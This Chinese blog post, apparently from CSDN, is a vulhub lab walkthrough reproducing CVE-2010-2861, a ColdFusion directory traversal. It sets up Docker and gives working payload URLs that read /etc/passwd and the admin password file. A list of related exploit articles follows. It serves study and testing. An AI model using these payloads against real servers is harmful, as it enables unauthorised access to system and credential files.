CVE-2010-2861(Adobe ColdFusion 文件读取漏洞)

最新推荐文章于 2024-07-16 01:11:37 发布
最新推荐文章于 2024-07-16 01:11:37 发布
阅读量2.6k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: CVE-2010-2861
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/84191264
版权

漏洞介绍

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。

Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。

环境搭建

https://blog.csdn.net/qq_36374896/article/details/84102101
启动漏洞环境:

cd vulhub-master/coldfusion/CVE-2010-2861/
sudo docker-compose up -d
sudo docker ps

在这里插入图片描述

环境启动可能需要1~5分钟,启动后,访问

http://your-ip:8500/CFIDE/administrator/enter.cfm

可以看到初始化页面
在这里插入图片描述
输入密码admin,开始初始化整个环境。
在这里插入图片描述

漏洞复现

直接访问

http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

即可读取文件/etc/passwd
在这里插入图片描述
在这里插入图片描述

读取后台管理员密码

http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en

在这里插入图片描述

浅笑⁹⁹⁶
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
漏洞复现】Adobe ColdFusion 任意文件读取漏洞 CVE-2024-20767
失心少年
04-23 718
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!该平台ColdFusion 2023
Adobe ColdFusion 任意文件读取漏洞复现(CVE-2024-20767)
0xSec
03-31 876
由于 Adobe ColdFusion 的访问控制不当,未经身份认证的远程攻击者可以构造恶意请求读取目标服务器上的任意文件,泄露敏感信息。
利用Vulnhub复现漏洞 - Adobe ColdFusion 文件读取漏洞CVE-2010-2861
JiangBuLiu的博客
06-28 922
Adobe ColdFusion 文件读取漏洞CVE-2010-2861)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/coldfusion/CVE-2010-2861/ 漏洞原理 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(Cold...
Adobe ColdFusion文件读取突破(CVE-2010-2861
willow_liang的博客
04-15 227
Adobe ColdFusion文件读取漏洞CVE-2010-2861漏洞复现: Adobe ColdFusion是美国Adobe公司的一种动态Web服务器产品,其运行的CFML(ColdFusion标记语言)是针对Web应用程序的一种程序设计语言。Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 访问该目录 /CFIDE/administrator/enter.cfm?locale=../../../../../../../..
Nacos最新0day漏洞复现
最新发布
qq_55213436的博客
07-16 3603
漏洞的核心在于 Nacos 的某些接口没有严格的权限控制,攻击者可以通过特制的请求向 Nacos 服务器发送恶意数据,从而执行任意代码。下载nacos代码搭建环境这次漏洞 需要登录到后才才能利用漏洞涉及到 Nacos 在处理反序列化数据时的缺陷,攻击者能够通过特定的 JSON 数据结构,远程执行恶意代码。以利用该漏洞读取敏感文件、执行系统命令。
文件包含漏洞_Adobe ColdFusion 任意文件读取和任意文件包含漏洞
weixin_39966765的博客
12-18 239
转载:nosec 作者:iso60001近日,Adobe官方发布了针对Adobe Coldfusion的安全更新补丁。其中包含从Coldfusion安装目录中读取任意文件CVE-2020-3761远程文件读取;以及能从webroot或者根目录包含文件实现任意代码执行的CVE-2020-3794。值得注意的是,Tomcat前不久曝出过和AJP connectors相关的漏洞,同样和文件包含(潜在导...
Vulhub-coldfusion--CVE-2010-2861
Ronin_qianmo的博客
07-29 236
1、漏洞描述 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 2、启动靶场 3、访问地址 http://x.x.x.x:8500 4、找到登录界面 http://x.x.x.x:8500/CFIDE/administrator/index.cfm 默认登录的用
CVE-2010-2861漏洞复现(ColdFusion未授权漏洞)
G_Fu_Q的博客
04-08 857
漏洞介绍: Adobe ColdFusion(直译:冷聚变),是一个动态Web服务器,其CFML(ColdFusion Markup Language)是一种程序设计语言,类似JSP里的JSTL(JSP Standard Tag Lib),从1995年开始开发,其设计思想被一些人认为非常先进,被一些语言所借鉴。 Coldfusion 最早是由 Allaire 公司开发的一种应用服务器平台,其运行的 CFML(ColdFusion Markup Language)针对Web应用的一种脚本语言。文件以*.c
vulhub:Adobe ColdFusion文件读取漏洞复现(CVE-2010-2861
sszsNo1的博客
07-02 292
vulhub:Adobe ColdFusion文件读取漏洞CVE-2010-2861)如何复现
Adobe ColdFusion 目录遍历漏洞 (CVE-2010-2861)
zzzzz1284的博客
01-04 345
CVE-2010-2861
Adobe ColdFusion 文件读取漏洞CVE-2010-2861
weixin_50698958的博客
10-02 439
一、概述 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 参考: https://vulhub.org/#/environments/coldfusion/CVE-2010-2861/ 二、漏洞环境 路径:vulhub/coldfusion/CVE.
ElasticSearch 目录穿越漏洞CVE-2015-3337)
黑白的博客
12-13 2250
声明 好好学习,天天向上 漏洞描述 在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。 影响范围 1.4.5以下/1.5.2以下 复现过程 这里使用v1.4.4版本 使用vulhub cd /app/vulhub-master/elasticsearch/CVE-2015-3337 使用docker启动 docker-compose up -d 环境启动后,访问http://your-ip:920
09 - vulhub - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
易编橙 · 终身成长社群,相遇已是上上签!
10-19 3846
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
CVE-2010-2861Adobe ColdFusion 文件读取
Foreverlove112的博客
11-08 327
CVE-2010-2861Adobe ColdFusion 文件读取
coldfusion文件读取漏洞CVE-2010-2861
1stPeak's Blog
07-28 914
1、直接访问http//your-ip8500/CFIDE/administrator/enter.cfm?/etc/passwd%00en,即可读取文件/etc/passwd。2、读取后台管理员密码http//your-ip8500/CFIDE/administrator/enter.cfm?/lib/password.properties%00en。AdobeColdFusion8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。解密password。...
实战攻击之CVE-2010-2861 网络攻击实战
网络安全领域优质创作者
11-05 390
nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.10 -oX10.11.1.10.xmlxsltproc 扫描之后得到CVE:CVE-2010-2861 Google搜索后得到Adobe ColdFusion - Directory Traversal - Multiple remote Exploit https://github.com/ctfs/write-ups-2014/tree/master/d...
漏洞复现----17、Adobe ColdFusion目录遍历漏洞 (CVE-2010-2861)
七天
10-21 1109
文章目录一、漏洞介绍二、漏洞环境1、环境2、Payload三、漏洞复现1、logging/settings.cfm2、datasources/index.cfm3、j2eepackaging/editarchive.cfm4、CFIDE/administrator/settings/mappings.cfm5、CFIDE/administrator/enter.cfm四、特殊构造1、路径后不跟参数值,失败。2、路径后参数值为数字,成功。3、路径后参数值为字母,成功。4、路径后参数值为特殊符号,成功。 一、
Apache Flink CVE-2020-17518:远程文件写入漏洞分析
此外,此漏洞还可以与CVE-2020-17519结合,利用文件读取漏洞来验证文件是否已写入。" Apache Flink是一款流行的大数据流处理框架,其在2020年被发现存在一个严重的安全问题,即CVE-2020-17518。这个漏洞是由于在...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值